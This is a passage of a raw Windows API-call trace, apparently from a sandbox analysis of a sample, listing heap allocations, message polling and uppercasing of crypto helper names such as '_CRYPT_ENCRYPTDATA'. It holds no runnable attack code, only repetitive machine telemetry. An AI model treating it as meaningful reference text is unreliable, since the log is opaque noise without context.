lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0029.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0029.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0029.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0029.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5df2) returned 0x8affc0 [0029.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0029.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0029.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0029.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0029.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0029.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5df2) returned 0x8b5dc0 [0029.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0029.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.625] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0029.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0029.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0029.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0029.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5df2) returned 0x8affc0 [0029.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0029.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0029.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0029.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.626] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0029.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0029.626] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0029.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0029.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0029.626] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0029.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0029.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0029.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0029.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0029.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0029.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0029.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5df2) returned 0x8affc0 [0029.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0029.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0029.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0029.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0029.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0029.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88caf0 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5df2) returned 0x8bbbc0 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0029.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0029.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0029.628] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0029.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0029.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0029.628] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0029.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0029.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0029.628] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0029.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3e8 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0029.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cef8 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0029.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0029.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0029.629] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0029.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0029.629] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0029.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0029.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0029.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0029.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0029.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0029.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0029.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0029.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0029.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0029.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0029.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.630] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0029.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0029.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0029.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0029.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0029.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0029.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0029.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0029.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0029.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0029.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0029.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0029.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0029.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0029.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0029.631] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0029.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0029.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0029.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0029.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0029.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0029.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0029.631] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0029.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0029.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0029.631] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0029.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0029.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0029.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0029.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0029.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0029.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0029.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0029.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0029.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0029.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0029.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0029.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0029.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0029.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0029.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0029.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0029.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0029.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 